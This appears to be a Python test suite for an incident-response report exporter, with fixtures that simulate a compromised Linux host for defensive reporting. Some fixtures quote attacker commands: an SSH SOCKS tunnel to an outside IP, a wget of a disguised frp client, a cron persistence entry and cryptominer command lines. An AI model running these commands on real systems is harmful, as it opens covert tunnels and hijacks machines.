import sys
import tempfile
import unittest
import json
from pathlib import Path
from unittest.mock import patch


REPO_ROOT = Path(__file__).resolve().parents[1]
SCRIPTS_DIR = REPO_ROOT / "scripts"
if str(SCRIPTS_DIR) not in sys.path:
    sys.path.insert(0, str(SCRIPTS_DIR))

import export_investigation_report as export_investigation_report  # noqa: E402


class ExportInvestigationReportTests(unittest.TestCase):
    def test_case_dir_mode_always_writes_canonical_report_md(self) -> None:
        with tempfile.TemporaryDirectory() as tmp:
            temp_root = Path(tmp)
            case_dir = temp_root / "case"
            case_dir.mkdir()
            input_path = temp_root / "input.json"
            input_path.write_text("{}", encoding="utf-8")
            custom_output = temp_root / "custom-report.md"

            argv = [
                "export_investigation_report.py",
                "--input",
                str(input_path),
                "--case-dir",
                str(case_dir),
                "--output",
                str(custom_output),
            ]
            with (
                patch.object(sys, "argv", argv),
                patch.object(export_investigation_report, "load_json", return_value={}),
                patch.object(export_investigation_report, "build_report", return_value=("report-body", [])),
                patch.object(export_investigation_report, "write_companion_reports", return_value=[]),
            ):
                rc = export_investigation_report.main()

            self.assertEqual(rc, 0)
            self.assertTrue(custom_output.exists(), "Custom output should still be written.")
            self.assertTrue(
                (case_dir / "report.md").exists(),
                "Case bundle mode must always materialize the canonical report.md path.",
            )

    def test_prepare_report_context_prefers_platform_identity_when_host_os_is_unknown(self) -> None:
        data = {
            "host": {"name": "host-1", "ip": "1.2.3.4", "os": "unknown"},
            "scene_reconstruction": {
                "platform_identity": {
                    "os_release_id": "ubuntu",
                    "os_release_version": "22.04",
                    "os_release_codename": "jammy",
                }
            },
        }

        ctx = export_investigation_report.prepare_report_context(data, redact=False, strict=False, case_dir=None)
        self.assertEqual(ctx["os_name"], "ubuntu 22.04 jammy")

    def test_prepare_report_context_prefers_second_pass_adjusted_log_risk_count(self) -> None:
        data = {
            "log_integrity": [
                {"artifact": "/var/log/secure", "status": "missing"},
                {"artifact": "/var/log/messages", "status": "missing"},
            ],
            "second_pass_review": {
                "log_layout_review": {
                    "adjusted_primary_log_risk_count": 0,
                }
            },
        }

        ctx = export_investigation_report.prepare_report_context(data, redact=False, strict=False, case_dir=None)
        self.assertEqual(ctx["log_risk_count"], 0)

    def test_leadership_report_matches_single_file_case_report_style(self) -> None:
        with tempfile.TemporaryDirectory() as tmp:
            case_dir = Path(tmp) / "case"
            case_dir.mkdir()
            auth_artifact = case_dir / "auth.txt"
            auth_artifact.write_text(
                "[COMMAND]\ngrep -H -E 'Failed password|Accepted password|Invalid user' /var/log/auth.log\n\n[STDOUT]\n/var/log/auth.log:Jun 10 00:01:01 host sshd[101]: Failed password for invalid user admin from 198.51.100.7 port 38812 ssh2\n\n[STDERR]\n",
                encoding="utf-8",
            )
            cron_artifact = case_dir / "cron.txt"
            cron_artifact.write_text(
                "[COMMAND]\nfor f in /var/spool/cron/crontabs/*; do [ -f \"$f\" ] && sed -n '1,120p' \"$f\"; done\n\n[STDOUT]\n# DO NOT EDIT THIS FILE\n* * * * * /var/tmp/.crond/upd >/dev/null 2>&1\n\n[STDERR]\n",
                encoding="utf-8",
            )
            process_artifact = case_dir / "process.txt"
            process_artifact.write_text(
                "[COMMAND]\nps aux | grep miner\n\n[STDOUT]\nroot 222 98.0 1.1 /tmp/xmrig --pool pool.example --user wallet1\n\n[STDERR]\n",
                encoding="utf-8",
            )
            history_artifact = case_dir / "history.txt"
            history_artifact.write_text(
                "[COMMAND]\ngrep -RniE 'frp|ssh -fND' /root/.bash_history\n\n[STDOUT]\n/root/.bash_history:ssh -fND *:5555 bin@167.71.239.213\n/root/.bash_history:wget -c 36.20.127.207:81/frpc.jpg\n\n[STDERR]\n",
                encoding="utf-8",
            )
            data = {
                "incident": {"id": "INC-1", "title": "Case 1"},
                "host": {"name": "host-1", "ip": "1.2.3.4", "os": "ubuntu"},
                "evidence": [
                    {
                        "id": "E-1",
                        "source": "auth",
                        "observed_at": "2026-06-10T00:01:01+00:00",
                        "command": "grep -H -E 'Failed password|Accepted password|Invalid user' /var/log/auth.log",
                        "artifact": str(auth_artifact),
                        "command_hash": "c-auth",
                        "artifact_hash": "a-auth",
                        "artifact_size_bytes": 160,
                        "timed_out": False,
                    },
                    {
                        "id": "E-2",
                        "source": "persistence",
                        "observed_at": "2026-06-10T00:03:00+00:00",
                        "command": "for f in /var/spool/cron/crontabs/*; do [ -f \"$f\" ] && sed -n '1,120p' \"$f\"; done",
                        "artifact": str(cron_artifact),
                        "command_hash": "c-cron",
                        "artifact_hash": "a-cron",
                        "artifact_size_bytes": 120,
                        "timed_out": False,
                    },
                    {
                        "id": "E-3",
                        "source": "process",
                        "observed_at": "2026-06-10T00:05:00+00:00",
                        "command": "ps aux | grep miner",
                        "artifact": str(process_artifact),
                        "command_hash": "c-proc",
                        "artifact_hash": "a-proc",
                        "artifact_size_bytes": 123,
                        "timed_out": False,
                    },
                    {
                        "id": "E-4",
                        "source": "history",
                        "observed_at": "2026-06-10T00:06:00+00:00",
                        "command": "grep -RniE 'frp|ssh -fND' /root/.bash_history",
                        "artifact": str(history_artifact),
                        "command_hash": "c-hist",
                        "artifact_hash": "a-hist",
                        "artifact_size_bytes": 140,
                        "timed_out": False,
                    },
                ],
                "findings": [
                    {
                        "id": "F-1",
                        "statement": "Miner-like process observed",
                        "claim_type": "observed_fact",
                        "confidence": "medium",
                        "confidence_reason": "visible in process list",
                        "hypothesis_id": "H-1",
                        "evidence_ids": ["E-3"],
                    },
                    {
                        "id": "F-2",
                        "statement": "Suspicious cron persistence observed",
                        "claim_type": "observed_fact",
                        "confidence": "medium",
                        "confidence_reason": "visible in cron entry",
                        "hypothesis_id": "H-2",
                        "evidence_ids": ["E-2"],
                    }
                ],
                "timeline": [
                    {
                        "time": "2026-06-10T00:01:01+00:00",
                        "normalized_time_utc": "2026-06-10T00:01:01+00:00",
                        "event": "SSH password failures observed",
                        "source": "auth",
                        "evidence_ids": ["E-1"],
                    },
                    {
                        "time": "2026-06-10T00:03:00+00:00",
                        "normalized_time_utc": "2026-06-10T00:03:00+00:00",
                        "event": "Suspicious cron entry observed",
                        "source": "persistence",
                        "evidence_ids": ["E-2"],
                    },
                    {
                        "time": "2026-06-10T00:05:00+00:00",
                        "normalized_time_utc": "2026-06-10T00:05:00+00:00",
                        "event": "Miner process observed",
                        "source": "process",
                        "evidence_ids": ["E-3"],
                    }
                ],
                "scene_reconstruction": {
                    "runtime_profile_count": 1,
                    "runtime_profiles": [
                        {
                            "executable": "/var/tmp/.crond/java",
                            "algorithm": "randomx",
                            "pool": "146.59.32.251:5555",
                            "proxy": "172.21.141.121:5555",
                            "wallet": "wallet1",
                            "password": "x",
                            "cpu_threads": "8",
                            "origin_path": "/var/tmp/.crond/java",
                            "origin_line": "1",
                            "evidence_id": "E-3",
                        }
                    ],
                    "runtime_algorithms": ["randomx"],
                    "runtime_pools": ["146.59.32.251:5555"],
                    "runtime_proxies": ["172.21.141.121:5555"],
                    "runtime_wallets": ["wallet1"],
                    "runtime_passwords": ["x"],
                    "runtime_cpu_threads": ["8"],
                    "process_ioc_match_count": 1,
                    "auth_event_counts": {"failed": 3, "invalid": 1},
                    "auth_source_ips": ["198.51.100.7"],
                    "listening_ports": ["22", "5555"],
                    "top_cpu_processes": [
                        {
                            "pid": "222",
                            "cpu_percent": "98",
                            "executable": "/var/tmp/.crond/java",
                            "command": "/var/tmp/.crond/java -a randomx -o 146.59.32.251:5555 -x 172.21.141.121:5555",
                        }
                    ],
                    "malware_file_candidates": [
                        {
                            "path": "/var/tmp/.crond/java",
                            "sha256": "abc123",
                            "origin_path": "/var/tmp/.crond/java",
                        },
                        {
                            "path": "/var/tmp/.crond/upd",
                            "sha256": "def456",
                            "origin_path": "/var/tmp/.crond/upd",
                        }
                    ],
                },
                "second_pass_review": {
                    "log_layout_review": {"adjusted_primary_log_risk_count": 0},
                    "timeline_review": {
                        "status": "narrow_window",
                        "normalized_event_count": 1,
                        "time_span_minutes": 0,
                        "summary": "Recovered event timing is narrow and likely under-scopes earlier ingress or staging activity. Expand the time window before closing the case.",
                    },
                    "scope_closure_review": {
                        "status": "needs_external_corroboration",
                        "summary": "Host-only evidence is not sufficient to close the requested scope. 1 external or cross-host pivot(s) remain open.",
                        "external_pivots": [
                            {
                                "id": "identity_boundary_logs",
                                "reason": "Host-visible authentication sources exist, but authorization and upstream ingress still need non-host corroboration.",
                            }
                        ],
                    },
                    "workflow_review": {
                        "status": "completed_with_open_gaps",
                        "closure_ready_for_host_only_report": False,
                        "summary": "Second-pass review kept explicit open gaps visible; do not over-close the case on host evidence alone.",
                        "closure_notes": [
                            "Expand the UTC timeline using surviving artifacts and non-host telemetry before closing the ingress sequence."
                        ],
                    },
                },
            }

            body = export_investigation_report.build_leadership_report(data, redact=False, case_dir=str(case_dir))
        self.assertIn("## Conclusion", body)
        self.assertIn("Based on the current host-side read-only evidence", body)
        self.assertIn("## How The Conclusion Was Reached", body)
        self.assertIn("### Step 1.", body)
        self.assertIn("```bash", body)
        self.assertIn("```text", body)
        self.assertIn("## Affected IPs", body)
        self.assertIn("## Suspicious Files And Hashes", body)
        self.assertIn("## Recommended Response", body)
        self.assertIn("198.51.100.7", body)
        self.assertIn("/var/tmp/.crond/java", body)
        self.assertIn("abc123", body)
        self.assertIn("ssh -fND *:5555 bin@167.71.239.213", body)
        self.assertNotIn("## 🧪 Second-Pass Review", body)
        self.assertNotIn("## 🧩 Conclusion Matrix", body)
        self.assertNotIn("## Executive Conclusion", body)
        self.assertNotIn("## Key Evidence Excerpts", body)
        self.assertNotIn("### E-1", body)
        self.assertNotIn("[E-1]", body)
        self.assertNotIn("](./", body)
        self.assertNotIn("Identity / boundary authentication logs", body)

    def test_leadership_report_surfaces_collection_failure(self) -> None:
        data = {
            "incident": {"id": "INC-1", "title": "Case 1"},
            "host": {"name": "host-1", "ip": "1.2.3.4", "os": "ubuntu"},
            "collection_failure": {
                "status": "failed",
                "phase": "remote_command_precheck",
                "reason": "Remote command channel unavailable before collection.",
            },
        }

        body = export_investigation_report.build_leadership_report(data, redact=False, case_dir=None)
        self.assertIn("Collection failed before host-side evidence could be gathered.", body)
        self.assertIn("Remote command channel unavailable before collection.", body)
        self.assertNotIn("## 🧩 Conclusion Matrix", body)
        self.assertIn("## Conclusion", body)
        self.assertIn("## Collection Failure", body)

    def test_leadership_report_zh_cn_uses_case_report_style_without_links(self) -> None:
        with tempfile.TemporaryDirectory() as tmp:
            case_dir = Path(tmp) / "case"
            case_dir.mkdir()
            auth_artifact = case_dir / "auth.txt"
            auth_artifact.write_text(
                "[COMMAND]\ncat /var/log/auth.log\n\n[STDOUT]\nFailed password for root from 198.51.100.7\n\n[STDERR]\n",
                encoding="utf-8",
            )
            process_artifact = case_dir / "process.txt"
            process_artifact.write_text(
                "[COMMAND]\nps aux | grep miner\n\n[STDOUT]\nroot 1 99.0 0.1 /var/tmp/.crond/java -a randomx -o 146.59.32.251:5555\n\n[STDERR]\n",
                encoding="utf-8",
            )
            data = {
                "incident": {"id": "INC-3", "title": "Case 3"},
                "host": {"name": "host-3", "ip": "3.3.3.3", "os": "ubuntu"},
                "evidence": [
                    {
                        "id": "E-2",
                        "source": "auth",
                        "observed_at": "2026-06-10T01:00:00+00:00",
                        "command": "cat /var/log/auth.log",
                        "artifact": str(auth_artifact),
                        "command_hash": "c2",
                        "artifact_hash": "a2",
                        "artifact_size_bytes": 88,
                        "timed_out": False,
                    },
                    {
                        "id": "E-3",
                        "source": "process",
                        "observed_at": "2026-06-10T01:05:00+00:00",
                        "command": "ps aux | grep miner",
                        "artifact": str(process_artifact),
                        "command_hash": "c3",
                        "artifact_hash": "a3",
                        "artifact_size_bytes": 100,
                        "timed_out": False,
                    }
                ],
                "findings": [
                    {
                        "id": "F-2",
                        "statement": "Suspicious SSH password failures observed",
                        "claim_type": "observed_fact",
                        "confidence": "medium",
                        "confidence_reason": "visible in auth log",
                        "hypothesis_id": "H-2",
                        "evidence_ids": ["E-2"],
                    },
                    {
                        "id": "F-3",
                        "statement": "Miner-like process observed",
                        "claim_type": "observed_fact",
                        "confidence": "medium",
                        "confidence_reason": "visible in process list",
                        "hypothesis_id": "H-3",
                        "evidence_ids": ["E-3"],
                    }
                ],
                "scene_reconstruction": {
                    "runtime_profile_count": 1,
                    "runtime_profiles": [
                        {
                            "executable": "/var/tmp/.crond/java",
                            "algorithm": "randomx",
                            "pool": "146.59.32.251:5555",
                            "wallet": "wallet1",
                            "cpu_threads": "8",
                            "origin_path": "/var/tmp/.crond/java",
                            "origin_line": "1",
                            "evidence_id": "E-3",
                        }
                    ],
                    "auth_event_counts": {"failed": 5, "invalid": 1},
                    "auth_source_ips": ["198.51.100.7"],
                    "malware_file_candidates": [
                        {
                            "path": "/var/tmp/.crond/java",
                            "sha256": "abc123",
                            "origin_path": "/var/tmp/.crond/java",
                        }
                    ],
                },
                "second_pass_review": {
                    "accepted_auth_review": {
                        "sources": [{"ip": "198.51.100.7"}],
                        "current_session_candidate_count": 1,
                        "recurring_source_count": 1,
                        "authorization_unknown_count": 1,
                    }
                },
            }

            body = export_investigation_report.build_leadership_report_zh_cn(
                data,
                redact=False,
                case_dir=str(case_dir),
            )

        self.assertIn("## 结论", body)
        self.assertIn("## 发现过程", body)
        self.assertIn("### 步骤 1：", body)
        self.assertIn("```bash", body)
        self.assertIn("```text", body)
        self.assertIn("## 受波及 IP", body)
        self.assertIn("## 可疑文件与哈希", body)
        self.assertIn("## 处置建议", body)
        self.assertNotIn("## 🧪 二轮复核", body)
        self.assertNotIn("## 🧩 结论矩阵", body)
        self.assertNotIn("## 案件结论摘要", body)
        self.assertNotIn("## 🔗 关键证据片段", body)
        self.assertNotIn("Accepted", body)
        self.assertNotIn("### E-2", body)
        self.assertNotIn("](./", body)

    def test_chinese_reports_surface_lateral_and_hidden_process_review_sections(self) -> None:
        data = {
            "incident": {"id": "INC-9", "title": "Case 9"},
            "host": {"name": "host-9", "ip": "9.9.9.9", "os": "ubuntu"},
            "scene_reconstruction": {
                "lateral_movement_review": {
                    "active_outbound_peers": [
                        {
                            "ip": "10.9.8.10",
                            "port": "8080",
                            "process": "python3",
                            "path": "/usr/bin/python3",
                            "classification": "observed_fact",
                            "confidence_reason": "Current established connection only.",
                            "supporting_signals": ["E-NET-1"],
                            "counter_signals": [],
                            "evidence_ids": ["E-NET-1"],
                        }
                    ],
                    "conservative_lateral_targets": [
                        {
                            "ip": "10.9.8.7",
                            "port": "22",
                            "process": "ssh",
                            "path": "/tmp/.cache/sshd",
                            "classification": "inference",
                            "confidence_reason": "Live connection plus explicit ssh command evidence.",
                            "supporting_signals": ["active_connection", "ssh_toolchain"],
                            "counter_signals": [],
                            "evidence_ids": ["E-NET-2", "E-PROC-2"],
                        }
                    ],
                    "external_pivot_required_targets": [
                        {
                            "ip": "10.9.8.9",
                            "port": "873",
                            "process": "rsync",
                            "path": "/usr/bin/rsync",
                            "classification": "external_pivot_required",
                            "confidence_reason": "Toolchain evidence without matching live connection.",
                            "supporting_signals": ["rsync_toolchain"],
                            "counter_signals": ["no_live_connection"],
                            "evidence_ids": ["E-PROC-3"],
                        }
                    ],
                },
                "hidden_process_review": {
                    "deleted_exe_processes": [
                        {
                            "pid": "4321",
                            "path": "/tmp/.cache/sshd",
                            "evidence_ids": ["E-PROC-4"],
                        }
                    ],
                    "hidden_process_suspicions": [
                        {
                            "pid": "4321",
                            "name": "sshd",
                            "path": "/tmp/.cache/sshd",
                            "reason": "Deleted executable plus outbound ssh process path mismatch.",
                            "evidence_ids": ["E-PROC-2", "E-PROC-4"],
                        }
                    ],
                },
                "malware_file_candidates": [
                    {"path": "/tmp/.cache/sshd", "sha256": "abc123", "origin_path": "/tmp/.cache/sshd"}
                ],
            },
            "ip_traces": [
                {
                    "ip": "10.9.8.7",
                    "role": "conservative_lateral_target",
                    "trace_status": "unknown",
                    "reason": "Live connection plus ssh toolchain correlation.",
                    "evidence_ids": ["E-NET-2", "E-PROC-2"],
                }
            ],
            "evidence": [],
            "findings": [],
            "timeline": [],
        }

        leadership = export_investigation_report.build_leadership_report_zh_cn(data, redact=False, case_dir=None)
        full_report, _ = export_investigation_report.build_report_zh_cn(data, redact=False, strict=False, case_dir=None)

        self.assertIn("## 当前外联与保守疑似横向目标", leadership)
        self.assertIn("## 隐藏进程与伪装运行体异常", leadership)
        self.assertIn("10.9.8.7", leadership)
        self.assertIn("/tmp/.cache/sshd", leadership)
        self.assertIn("## 外联与横向目标复核", full_report)
        self.assertIn("## 隐藏进程与伪装运行体复核", full_report)
        self.assertIn("10.9.8.9", full_report)
        self.assertIn("abc123", full_report)

    def test_english_report_avoids_placeholder_question_mark_formatting(self) -> None:
        with tempfile.TemporaryDirectory() as tmp:
            case_dir = Path(tmp) / "case"
            case_dir.mkdir()
            artifact = case_dir / "artifact.txt"
            artifact.write_text(
                "[COMMAND]\nps aux | grep miner\n\n[STDOUT]\nroot 1 0.0 0.1 miner\n\n[STDERR]\n",
                encoding="utf-8",
            )
            data = {
                "incident": {"id": "INC-2", "title": "Case 2"},
                "host": {"name": "host-2", "ip": "2.2.2.2", "os": "ubuntu"},
                "generated_at": "2026-06-10T00:00:00+00:00",
                "evidence": [
                    {
                        "id": "E-1",
                        "source": "process",
                        "observed_at": "2026-06-10T00:00:01+00:00",
                        "command": "ps aux | grep miner",
                        "artifact": str(artifact),
                        "command_hash": "c",
                        "artifact_hash": "a",
                        "artifact_size_bytes": 123,
                        "timed_out": False,
                    }
                ],
                "findings": [
                    {
                        "id": "F-1",
                        "statement": "Miner-like process observed",
                        "claim_type": "observed_fact",
                        "confidence": "medium",
                        "confidence_reason": "visible in process list",
                        "hypothesis_id": "H-1",
                        "evidence_ids": ["E-1"],
                    }
                ],
                "timeline": [
                    {
                        "time": "2026-06-10T00:00:01+00:00",
                        "normalized_time_utc": "2026-06-10T00:00:01+00:00",
                        "event": "Miner process observed",
                        "source": "process",
                        "evidence_ids": ["E-1"],
                    }
                ],
                "hypothesis_matrix": [
                    {
                        "hypothesis_id": "H-1",
                        "title": "CPU runtime miner hypothesis",
                        "status": "supported",
                        "confidence": "medium",
                        "summary": "Miner-like process observed",
                        "supporting_evidence_ids": ["E-1"],
                        "counter_evidence_ids": [],
                    }
                ],
                "scene_reconstruction": {
                    "process_ioc_match_count": 1,
                    "runtime_profile_count": 1,
                    "runtime_profiles": [
                        {
                            "executable": "/tmp/xmrig",
                            "algorithm": "randomx",
                            "pool": "pool.example",
                            "proxy": "-",
                            "wallet": "wallet1",
                            "password": "x",
                            "cpu_threads": "8",
                            "origin_path": "/proc/123/cmdline",
                            "origin_line": "1",
                            "evidence_id": "E-1",
                        }
                    ],
                    "runtime_algorithms": ["randomx"],
                    "runtime_pools": ["pool.example"],
                    "runtime_proxies": ["-"],
                    "runtime_wallets": ["wallet1"],
                    "runtime_passwords": ["x"],
                    "runtime_cpu_threads": ["8"],
                },
                "ip_traces": [
                    {
                        "ip": "8.8.8.8",
                        "role": "remote",
                        "trace_status": "unknown",
                        "reason": "not traced",
                        "evidence_ids": ["E-1"],
                    }
                ],
                "log_integrity": [
                    {
                        "artifact": "/var/log/auth.log",
                        "status": "ok",
                        "reason": "present",
                        "evidence_ids": ["E-1"],
                    }
                ],
            }

            body, _ = export_investigation_report.build_report(
                json.loads(json.dumps(data)),
                redact=False,
                strict=False,
                case_dir=str(case_dir),
            )

        self.assertNotIn("<summary><strong>E-1</strong> ?", body)
        self.assertIn("<summary><strong>E-1</strong> :: process :: 2026-06-10T00:00:01+00:00 ::", body)
        self.assertIn("### OK /var/log/auth.log", body)


if __name__ == "__main__":
    unittest.main()
